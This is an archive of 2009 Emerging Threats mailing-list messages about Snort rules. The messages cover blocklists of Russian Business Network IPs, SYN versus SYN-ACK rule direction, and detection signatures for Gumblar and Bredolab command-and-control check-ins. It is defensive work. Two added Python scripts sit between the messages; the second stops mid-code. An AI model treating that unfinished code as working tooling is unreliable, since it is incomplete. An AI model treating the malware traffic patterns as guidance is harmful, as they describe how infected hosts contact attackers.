> alert tcp [] any -> $HOME_NET any (flags: SA;) = alert!
> alert tcp $HOME_NET any -> [] any (flags: SA;) = nothing
>
> Now back to Memorial Day yard work....
>
> --
> Eoin Miller
>
>
> Matt Jonkman wrote:
>> What if, ignoring the reversing homenet/extnet thing, we just go with
>> flow:established on the tcp sigs and make it directionless?
>>
>> That'll eliminate a lot of the noise and only give you an alert when you
>> have a box talking to them.
>>
>> Then we don't need to open a new sid range or reverse the directions, so
>> no one has to redo blocking/response rules.
>>
>> Matt
>>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

-- 
Darren Spruell
phatbuckett at gmail.com

From eoin.miller at trojanedbinaries.com Tue May 26 00:46:06 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Tue, 26 May 2009 00:46:06 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>
References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com> <4A1ACE8A.2040205@trojanedbinaries.com> <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>
Message-ID: <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com>

Except that the rules, as they were, cause about 60-70% packet loss on a ~250mbit/s link. So you aren't exactly catching all the alerts on even just moderate speed links you are monitoring. Looking for the SYNs only catches connections coming inbound from the RBN network, and you are generally more concerned with people reaching out to the RBN as they are downloading malware/joining botnets from behind your NAT'd firewalls. Looking for the SYN/ACK flagged packet fixes the issue with the rules currently only looking for the SYN packet without flipping the src/dst.

-- 
Eoin Miller

On May 25, 2009, at 5:11 PM, Darren Spruell wrote:
> Some may be interested in attempts to communicate and not only
> established connections. The 'any' port spec may allow ports that are
> filtered, for example, but it can be useful to know about connection
> attempts regardless.
>
> DS
>
> On Mon, May 25, 2009 at 9:59 AM, Eoin Miller wrote:
>> Can't believe this didn't occur to me sooner, but if reversing the
>> flow/direction is really going to be a problem, why not look for the
>> response SYN/ACK packet instead of the initial SYN when setting up the
>> TCP connection?
>>
>> alert tcp [] any -> $HOME_NET any (flags: SA;) = alert!
>> alert tcp $HOME_NET any -> [] any (flags: SA;) = nothing
>>
>> Now back to Memorial Day yard work....
>>
>> --
>> Eoin Miller
>>
>>
>> Matt Jonkman wrote:
>>> What if, ignoring the reversing homenet/extnet thing, we just go with
>>> flow:established on the tcp sigs and make it directionless?
>>>
>>> That'll eliminate a lot of the noise and only give you an alert when you
>>> have a box talking to them.
>>>
>>> Then we don't need to open a new sid range or reverse the directions, so
>>> no one has to redo blocking/response rules.
>>>
>>> Matt
>>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>
>
>
> --
> Darren Spruell
> phatbuckett at gmail.com

From emerging at emergingthreats.net Tue May 26 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue, 26 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090526200011.F1B514504B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Tue May 26 16:00:11 2009 [***]

[*] Rules modifications: [*]
    None.
[---] Removed non-rule lines: [---]

    -> Removed from emerging-sid-msg.map (76):

    -> Removed from emerging-sid-msg.map.txt (76):
Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic 
UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From wkitty42 at windstream.net Tue May 26 17:45:25 2009 From: wkitty42 at windstream.net (waldo kitty) Date: Tue, 26 May 2009 17:45:25 -0400 Subject: [Emerging-Sigs] IP List rulesets In-Reply-To: <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com> References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com> <4A1ACE8A.2040205@trojanedbinaries.com> <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com> <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com> Message-ID: <4A1C62F5.8030100@windstream.net> Eoin Miller wrote: > only catches connections coming inbound from the RBN network and you > are generally more concerned with people reaching out to the RBN as > they are downloading malware/joining botnets from behind your NAT'd > firewalls. yes and no... we do not want /any/ access attempts to out network allowed... from inside or "cold calling" probes from outside... we see where a two layered approach is a GoodThing... the first layer being to monitor for any access attempts to our network from any/all RBN networks... the second, being the notices about internal machine trying to make contact with RBN networks... this second one seen mainly as a good way to track down the infested machine(s) for cleaning... 
especially since the RBN networks are already blocked by the first ;) -- _\/ (@@) Waldo Kitty, Waldo's Place USA __ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com _|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com ____|_____|_____|_____|_____|_____|____ ftp://ftp.wpusa.dynip.com _|_Eat_SPAM_to_email_me!_YUM!__|_____ wkitty42 -at- windstream.net From eoin.miller at trojanedbinaries.com Tue May 26 19:05:08 2009 From: eoin.miller at trojanedbinaries.com (Eoin Miller) Date: Tue, 26 May 2009 19:05:08 -0400 Subject: [Emerging-Sigs] IP List rulesets In-Reply-To: <4A1C62F5.8030100@windstream.net> References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com> <4A1ACE8A.2040205@trojanedbinaries.com> <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com> <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com> <4A1C62F5.8030100@windstream.net> Message-ID: <4A1C75A4.9070106@trojanedbinaries.com> Please review the current rbn-rules as they do not alert/block to any outgoing TCP connections to the RBN: alert tcp [114.80.67.30,114.80.67.32,115.126.2.116,115.126.2.117,115.126.2.118,115.126.2.121,115.126.2.140,115.126.2.141,115.126.2.233,115.126.2.8] any -> $HOME_NET any (msg:"ET RBN Known Russian Business Network IP TCP (1)"; flags:S; reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2406000; rev:130;) Short of doubling the rules (one for incoming and the other for outgoing) adding the SA flag, instead of just the S flag, tracks who is reaching out instead of just who is reaching in. Clients are not infected by RBN reaching in, they are infected by reaching out to malicious sites. Once infected, they reach out again. 
The above rule stops reaching IN from RBN, but does nothing to stop an infected machine from reaching out nor does it stop a clean machine from reaching OUT to a drive by site. -- Eoin Miller waldo kitty wrote: > Eoin Miller wrote: >> only catches connections coming inbound from the RBN network and you >> are generally more concerned with people reaching out to the RBN as >> they are downloading malware/joining botnets from behind your NAT'd >> firewalls. > > yes and no... we do not want /any/ access attempts to out network > allowed... > from inside or "cold calling" probes from outside... we see where a > two layered > approach is a GoodThing... the first layer being to monitor for > any access > attempts to our network from any/all RBN networks... the second, being > the > notices about internal machine trying to make contact with RBN > networks... this > second one seen mainly as a good way to track down the infested > machine(s) for > cleaning... especially since the RBN networks are already blocked by > the first ;) > From wkitty42 at windstream.net Tue May 26 20:40:43 2009 From: wkitty42 at windstream.net (waldo kitty) Date: Tue, 26 May 2009 20:40:43 -0400 Subject: [Emerging-Sigs] IP List rulesets In-Reply-To: <4A1C75A4.9070106@trojanedbinaries.com> References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com> <4A1ACE8A.2040205@trojanedbinaries.com> <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com> <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com> <4A1C62F5.8030100@windstream.net> <4A1C75A4.9070106@trojanedbinaries.com> Message-ID: <4A1C8C0B.2090408@windstream.net> Eoin Miller wrote: > Please review the current rbn-rules as they do not alert/block to any > outgoing TCP connections to the RBN: been there, done that ;) my understanding in this set of RBN oriented threads is that 
some have proposed sets of rules for both, internally looking and externally looking sensors... [trim of example rule] > Short of doubling the rules (one for incoming and the other for > outgoing) adding the SA flag, instead of just the S flag, tracks who is > reaching out instead of just who is reaching in. this doubling has been proposed... > Clients are not > infected by RBN reaching in, they are infected by reaching out to > malicious sites. Once infected, they reach out again. right... but my/our concern is not just for clients reaching out but also of RBN sites "cold calling" and trying to force their way into possibly insecure servers ;) > The above rule > stops reaching IN from RBN, but does nothing to stop an infected machine > from reaching out nor does it stop a clean machine from reaching OUT to > a drive by site. understood... maybe i'm getting lost in what the actual proposal(s) are looking to tag? the existing rules have allowed us to block any and all accesses from RBN machines on the outside... "doubling up on the rules" would also allow us to determine which internal machines are reaching out ;) some networks have internally facing sensors while others have externally facing ones... then there are those that have internal and external watchers ;) > -- > Eoin Miller > > > > waldo kitty wrote: >> Eoin Miller wrote: >>> only catches connections coming inbound from the RBN network and you >>> are generally more concerned with people reaching out to the RBN as >>> they are downloading malware/joining botnets from behind your NAT'd >>> firewalls. >> yes and no... we do not want /any/ access attempts to out network >> allowed... >> from inside or "cold calling" probes from outside... we see where a >> two layered >> approach is a GoodThing... the first layer being to monitor for >> any access >> attempts to our network from any/all RBN networks... the second, being >> the >> notices about internal machine trying to make contact with RBN >> networks... 
this >> second one seen mainly as a good way to track down the infested >> machine(s) for >> cleaning... especially since the RBN networks are already blocked by >> the first ;) -- _\/ (@@) Waldo Kitty, Waldo's Place USA __ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com _|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com ____|_____|_____|_____|_____|_____|____ ftp://ftp.wpusa.dynip.com _|_Eat_SPAM_to_email_me!_YUM!__|_____ wkitty42 -at- windstream.net From mcholste at gmail.com Wed May 27 10:00:54 2009 From: mcholste at gmail.com (Martin Holste) Date: Wed, 27 May 2009 09:00:54 -0500 Subject: [Emerging-Sigs] IP List rulesets In-Reply-To: <4A1C8C0B.2090408@windstream.net> References: <4A131D81.3040907@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com> <4A1ACE8A.2040205@trojanedbinaries.com> <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com> <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com> <4A1C62F5.8030100@windstream.net> <4A1C75A4.9070106@trojanedbinaries.com> <4A1C8C0B.2090408@windstream.net> Message-ID: Ok, I submit that while both parties are right on the which is important, inbound vs. outbound connections, the two scenarios are separate problems and should be handled by separate tools. Specifically, detecting inbound scans is something I find much more suited for Netflow or another session-based flow tracker. If you're really that concerned with inbound scans, then you need a more dedicated framework to analyzing traffic flows in general. I myself prefer IPAudit, one of the lesser-known flow modules out on Sourceforge. I use it to put all my flows in a database, then I can run statistical analysis and searches easily. You can create scripts that will auto-shun, etc. that way is much more efficient than trying to bend Snort into a a function that truthfully is not one of its "core competencies." 
I'm sure some of you will argue that point, but when you take a step back and look at Snort, what it does best is high-level protocol reassembly and grepping. The flow analysis parts are just there to aid the grepping parts. And yes, I know that "Snort is not just a traffic grepper," but certainly that is its primary function. Let me put it this way: when you've got a hammer, everything looks like a nail. So, my vote would be to drop the inbound scans and keep just the outbound scans because inbound scans are more statistically relevant than tactically relevant. --Martin On Tue, May 26, 2009 at 7:40 PM, waldo kitty wrote: > Eoin Miller wrote: > > Please review the current rbn-rules as they do not alert/block to any > > outgoing TCP connections to the RBN: > > been there, done that ;) > > my understanding in this set of RBN oriented threads is that some have > proposed > sets of rules for both, internally looking and externally looking > sensors... > > [trim of example rule] > > > Short of doubling the rules (one for incoming and the other for > > outgoing) adding the SA flag, instead of just the S flag, tracks who is > > reaching out instead of just who is reaching in. > > this doubling has been proposed... > > > Clients are not > > infected by RBN reaching in, they are infected by reaching out to > > malicious sites. Once infected, they reach out again. > > right... but my/our concern is not just for clients reaching out but also > of RBN > sites "cold calling" and trying to force their way into possibly insecure > servers ;) > > > The above rule > > stops reaching IN from RBN, but does nothing to stop an infected machine > > from reaching out nor does it stop a clean machine from reaching OUT to > > a drive by site. > > > understood... maybe i'm getting lost in what the actual proposal(s) are > looking > to tag? the existing rules have allowed us to block any and all accesses > from > RBN machines on the outside... 
"doubling up on the rules" would also allow > us to > determine which internal machines are reaching out ;) > > some networks have internally facing sensors while others have externally > facing > ones... then there are those that have internal and external watchers ;) > > > -- > > Eoin Miller > > > > > > > > waldo kitty wrote: > >> Eoin Miller wrote: > >>> only catches connections coming inbound from the RBN network and you > >>> are generally more concerned with people reaching out to the RBN as > >>> they are downloading malware/joining botnets from behind your NAT'd > >>> firewalls. > >> yes and no... we do not want /any/ access attempts to out network > >> allowed... > >> from inside or "cold calling" probes from outside... we see where a > >> two layered > >> approach is a GoodThing... the first layer being to monitor for > >> any access > >> attempts to our network from any/all RBN networks... the second, being > >> the > >> notices about internal machine trying to make contact with RBN > >> networks... this > >> second one seen mainly as a good way to track down the infested > >> machine(s) for > >> cleaning... especially since the RBN networks are already blocked by > >> the first ;) > > > -- > _\/ > (@@) Waldo Kitty, Waldo's Place USA > __ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com > _|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com > ____|_____|_____|_____|_____|_____|____ ftp://ftp.wpusa.dynip.com > _|_Eat_SPAM_to_email_me!_YUM!__|_____ wkitty42 -at- windstream.net > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -------------- next part -------------- An HTML attachment was scrubbed... 
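The incoming/outgoing split argued over in this thread is easiest to keep consistent if both rule sets are generated from one address list rather than edited by hand. The script below is an added example written for this page; it is not Emerging Threats' rule generator and not code posted by anyone in the thread. It reuses the ten addresses from the rule Eoin quoted (sid 2406000), but the sid range starting at 9900000, the msg wording and the `rev` are placeholders chosen for this example. Per chunk of addresses it emits the existing inbound SYN rule, the outbound SYN rule that shows which internal host reached out, and the SYN-ACK variant Eoin mentions, which identifies an internal host's outbound connection from the return direction alone.

```python
"""Emit directional Snort rules from an IP list.

Added example for this thread; not Emerging Threats' generator and not code
from any message above. The address list is copied from the rbn rule quoted
in the thread (sid 2406000); the sid base and msg suffixes are placeholders.
"""
import ipaddress
from typing import Dict, Iterable, Iterator, List, Sequence, Tuple

# Copied from the thread's "ET RBN Known Russian Business Network IP TCP (1)" rule.
RBN_IPS: List[str] = [
    "114.80.67.30", "114.80.67.32", "115.126.2.116", "115.126.2.117",
    "115.126.2.118", "115.126.2.121", "115.126.2.140", "115.126.2.141",
    "115.126.2.233", "115.126.2.8",
]
DOC_URL = "url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork"

# (source, destination, TCP flags, threshold tracking key, msg label).
# "LIST" is replaced by the bracketed address list when the rule is built.
#   inbound : a listed host sends the SYN to us, so track by_src names the scanner
#   outbound: an internal host sends the SYN, so track by_src names the infected box
#   synack  : a listed host answers an internal SYN; a sensor that only sees the
#             return direction still learns the internal host, so track by_dst
# flags:S matches a packet whose only flag is SYN, as in the thread's rule; a SYN
# carrying ECN bits would need the Snort mask form flags:S,12 to be ignored.
DIRECTIONS: Dict[str, Tuple[str, str, str, str, str]] = {
    "inbound": ("LIST", "$HOME_NET", "S", "by_src", "Inbound"),
    "outbound": ("$HOME_NET", "LIST", "S", "by_src", "Outbound"),
    "synack": ("LIST", "$HOME_NET", "SA", "by_dst", "SYN-ACK to Internal Host"),
}


def clean_ips(ips: Iterable[str]) -> List[str]:
    """Validate each entry (address or CIDR), drop duplicates, keep list order."""
    out: List[str] = []
    for raw in ips:
        raw = raw.strip()
        parsed = ipaddress.ip_network(raw, strict=False) if "/" in raw else ipaddress.ip_address(raw)
        text = str(parsed)
        if text not in out:
            out.append(text)
    return out


def chunks(items: Sequence[str], size: int) -> Iterator[Sequence[str]]:
    for start in range(0, len(items), size):
        yield items[start:start + size]


def make_rule(direction: str, ips: Sequence[str], index: int, sid: int, rev: int = 1) -> str:
    src, dst, flags, track, label = DIRECTIONS[direction]
    iplist = "[" + ",".join(ips) + "]"
    src = iplist if src == "LIST" else src
    dst = iplist if dst == "LIST" else dst
    return (
        f"alert tcp {src} any -> {dst} any "
        f'(msg:"ET RBN Known Russian Business Network IP {label} TCP ({index})"; '
        f"flags:{flags}; reference:{DOC_URL}; "
        f"threshold: type limit, track {track}, seconds 60, count 1; "
        f"classtype:misc-attack; sid:{sid}; rev:{rev};)"
    )


def generate(ips: Iterable[str], directions: Sequence[str] = ("inbound", "outbound"),
             chunk_size: int = 10, sid_base: int = 9900000) -> List[str]:
    """One rule per (chunk, direction); sids are handed out sequentially from sid_base."""
    rules: List[str] = []
    sid = sid_base
    for index, group in enumerate(chunks(clean_ips(ips), chunk_size), start=1):
        for direction in directions:
            rules.append(make_rule(direction, group, index, sid))
            sid += 1
    return rules


if __name__ == "__main__":
    for rule in generate(RBN_IPS, ("inbound", "outbound", "synack")):
        print(rule)
```

Sites that only want one of the two files run `generate` with a single direction; the sid allocation is the part worth keeping deterministic, since a SnortSam or inline deployment keys its block actions on the sid and the thread's BLOCKING rules show that convention already in use.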
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090527/2c3b0fe5/attachment.html

From jaime.blasco at alienvault.com Wed May 27 10:59:10 2009
From: jaime.blasco at alienvault.com (Jaime Blasco)
Date: Wed, 27 May 2009 16:59:10 +0200
Subject: [Emerging-Sigs] Gumblar Activity
Message-ID: <53834cf20905270759s44540bb2u7d56a35d0444354f@mail.gmail.com>

Hi!

I've been investigating Gumblar activity last week, here is an interesting
article relating Gumblar's activity:

www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/

And here are some rules to detect gumblar's c&c activity:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Gumblar checkin"; content:"GET "; depth:4; uricontent:"controller.php"; uricontent:"action=bot"; uricontent:"&entity_list="; uricontent:"&uid="; uricontent:"&first="; uricontent:"&guid="; uricontent:"&rnd="; classtype:trojan-activity; reference:url,www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/; sid:; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Gumblar check in type request"; content:"GET "; depth:4; uricontent:"v="; uricontent:"&s="; uricontent:"&uid="; uricontent:"&p="; uricontent:"&q="; content:"User-Agent\:|0d 0a|"; classtype:trojan-activity; reference:url,www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/; sid:; rev:1;)

Anyway I detect that the first rule is similar to this present on emerging rules.

emerging-all.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Peed Report to Controller"; flow:established,to_server; uricontent:"/controller.php?action="; uricontent:"&entity"; uricontent:"&rnd="; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2008501; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Peed; sid:2008501; rev:2;)

Check it.

Regards

-- 
_______________________________
Jaime Blasco
www.ossim.com
www.alienvault.com
Email: jaime.blasco at alienvault.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090527/2be798fa/attachment.html

From dxp2532 at gmail.com Wed May 27 11:11:47 2009
From: dxp2532 at gmail.com (dxp)
Date: Wed, 27 May 2009 11:11:47 -0400
Subject: [Emerging-Sigs] Gumblar Activity
In-Reply-To: <53834cf20905270759s44540bb2u7d56a35d0444354f@mail.gmail.com>
References: <53834cf20905270759s44540bb2u7d56a35d0444354f@mail.gmail.com>
Message-ID: <1243437107.7039.8.camel@kinta>

There's already one in the set by Darren Spruell:

/etc/snort/rules/emerging-virus.rules-344-#by Darren Spruell
/etc/snort/rules/emerging-virus.rules:345:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Downloader Communicating With Controller (1)"; flow:established,to_server; uricontent:"action="; nocase; uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase; uricontent:"&first="; uricontent:"&guid="; nocase; uricontent:"&rnd="; nocase; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B; sid:2009353; rev:1;)

-
-=[ dxp ]=-
0xA3F3C6E3

On Wed, 2009-05-27 at 16:59 +0200, Jaime Blasco wrote:
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE
> Gumblar checkin"; content:"GET "; depth:4;
> uricontent:"controller.php"; uricontent:"action=bot";
> uricontent:"&entity_list="; uricontent:"&uid="; uricontent:"&first=";
> uricontent:"&guid="; uricontent:"&rnd="; classtype:trojan-activity;
> reference:url,www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/; sid:; rev:1;)

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090527/831fee89/attachment-0001.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090527/831fee89/attachment-0001.bin

From jaime.blasco at alienvault.com Wed May 27 11:14:20 2009
From: jaime.blasco at alienvault.com (Jaime Blasco)
Date: Wed, 27 May 2009 17:14:20 +0200
Subject: [Emerging-Sigs] Gumblar Activity
In-Reply-To: <1243437107.7039.8.camel@kinta>
References: <53834cf20905270759s44540bb2u7d56a35d0444354f@mail.gmail.com> <1243437107.7039.8.camel@kinta>
Message-ID: <53834cf20905270814u2772e085o2b44a588e4ee87a8@mail.gmail.com>

Yeah, we can use the second one:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Gumblar check in type request"; content:"GET "; depth:4; uricontent:"v="; uricontent:"&s="; uricontent:"&uid="; uricontent:"&p="; uricontent:"&q="; content:"User-Agent\:|0d 0a|"; classtype:trojan-activity; reference:url,www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/; sid:; rev:1;)

to have more c&c traffic coverage.

Regards

2009/5/27 dxp
> There's already one in the set by Darren Spruell:
>
> /etc/snort/rules/emerging-virus.rules-344-#by Darren Spruell
>
> /etc/snort/rules/emerging-virus.rules:345:alert tcp $HOME_NET any ->
> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Downloader Communicating
> With Controller (1)"; flow:established,to_server; uricontent:"action=";
> nocase; uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase;
> uricontent:"&first="; uricontent:"&guid="; nocase; uricontent:"&rnd=";
> nocase; classtype:trojan-activity; reference:url,
> www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B;
> sid:2009353; rev:1;)
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
>
>
>
> On Wed, 2009-05-27 at 16:59 +0200, Jaime Blasco wrote:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE
> Gumblar checkin"; content:"GET "; depth:4; uricontent:"controller.php";
> uricontent:"action=bot"; uricontent:"&entity_list="; uricontent:"&uid=";
> uricontent:"&first="; uricontent:"&guid="; uricontent:"&rnd=";
> classtype:trojan-activity; reference:url,
> www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/;
> sid:; rev:1;)
>

-- 
_______________________________
Jaime Blasco
www.ossim.com
www.alienvault.com
Email: jaime.blasco at alienvault.com

-------------- next part --------------
An HTML attachment was scrubbed...
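Whether Jaime's first rule really duplicates sid 2009353 can be checked mechanically instead of by eye. The script below is an added example written for this page, not Emerging Threats tooling and not code from the thread. It parses the four rules quoted in this exchange (the two Gumblar proposals with their empty `sid:` kept as posted, the Bredolab rule and the Peed rule), reports when every `uricontent` string of one rule occurs inside some string of another (so the second rule can only fire when the first already does), and runs each rule over two HTTP requests. The two requests, the `example.invalid` host and the parameter values are constructed for the test, not captured Gumblar traffic; `uricontent` is matched against the raw request-line URI here, where Snort uses its normalized URI buffer.

```python
"""Compare Snort HTTP rules for overlap and try them against a request.

Added example for this thread, not Emerging Threats tooling. The rules are
copied from the messages above; the requests are constructed test input.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Sequence

RULES = [
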